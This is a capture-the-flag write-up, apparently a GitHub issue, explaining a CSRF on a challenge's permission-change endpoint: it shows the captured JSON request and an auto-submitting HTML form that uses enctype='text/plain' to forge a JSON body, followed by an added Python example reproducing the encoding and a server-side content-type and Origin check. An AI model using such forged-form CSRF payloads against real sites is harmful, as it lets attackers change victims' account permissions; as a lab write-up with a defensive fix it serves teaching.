Open aszx87410 opened 2 years ago
You can login with any username, and then there is a page to change permission: http://124.71.205.122:10002/change.php
The request looks like this, it's in JSON format:
```
POST /changeapi.php HTTP/1.1
Host: 124.71.205.122:10002
Content-Length: 19
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Content-Type: application/json; charset=UTF-8
Origin: http://124.71.205.122:10002
Referer: http://124.71.205.122:10002/change.php
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=1ab6387f551b235d26d1c88a3685d752
Connection: close

{"username":"huli"}
```
There is also a bot; you can send it any link, so we can do CSRF here via `<form>` and `enctype="text/plain"`, like this:

```html
<body>
  <form id=a action="http://124.71.205.122:10002/changeapi.php" method="POST" enctype="text/plain">
    <input name='{"username":"fweewfwef", "abc":"' value='123"}'>
  </form>
  <script>
    a.submit()
  </script>
</body>
```
The form above will send a request with body `{"username":"fweewfwef", "abc":"=123"}` and content type `text/plain`. The server did not check the content type, so it's fine.
After updating the permission, just visit home.php and get the flag.
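Added example (not part of the writeup): the first function reproduces how a browser encodes an `enctype="text/plain"` form so the body in the post can be checked, and `check_request` is the server-side validation that `changeapi.php` is described as missing (media type must be `application/json`, plus an Origin allow-list). `ALLOWED_ORIGIN` and the attacker origin are constructed placeholders, not the challenge host.

```python
import json
from typing import Dict, Optional, Tuple

# Constructed placeholder for the deploying site's own origin.
ALLOWED_ORIGIN = "https://app.example"


def text_plain_form_body(fields: Dict[str, str]) -> str:
    """Encode fields as a browser does for enctype="text/plain":
    one `name=value` pair per line, no percent-encoding."""
    return "\r\n".join(f"{k}={v}" for k, v in fields.items())


def is_json_content_type(content_type: Optional[str]) -> bool:
    """Accept only the application/json media type; parameters such as
    `; charset=UTF-8` are allowed, anything else (text/plain, missing) is not."""
    if not content_type:
        return False
    media_type = content_type.split(";", 1)[0].strip().lower()
    return media_type == "application/json"


def check_request(headers: Dict[str, str], body: str) -> Tuple[bool, str]:
    """Validation the endpoint should perform before changing permissions.
    Returns (accepted, reason). Header names are compared case-insensitively.
    Assumption: the legitimate client always sends Origin (fetch/XHR does)."""
    h = {k.lower(): v for k, v in headers.items()}
    if not is_json_content_type(h.get("content-type")):
        return False, "content-type is not application/json"
    if h.get("origin") != ALLOWED_ORIGIN:
        return False, "origin not allowed"
    try:
        data = json.loads(body)
    except ValueError:
        return False, "body is not valid JSON"
    if not isinstance(data, dict) or "username" not in data:
        return False, "missing username"
    return True, "ok"


if __name__ == "__main__":
    # The input from the writeup's form: name and value from the single <input>.
    body = text_plain_form_body({'{"username":"fweewfwef", "abc":"': '123"}'})
    print(body)                    # the "=123" lands inside the dummy "abc" field
    print(check_request({"Content-Type": "text/plain",
                         "Origin": "https://attacker.example"}, body))
    print(check_request({"Content-Type": "application/json; charset=UTF-8",
                         "Origin": ALLOWED_ORIGIN}, '{"username":"huli"}'))
```

A cross-site `<form>` cannot set `Content-Type: application/json`, so the media-type check alone stops this form-based CSRF; the Origin check (or a CSRF token) covers the general case.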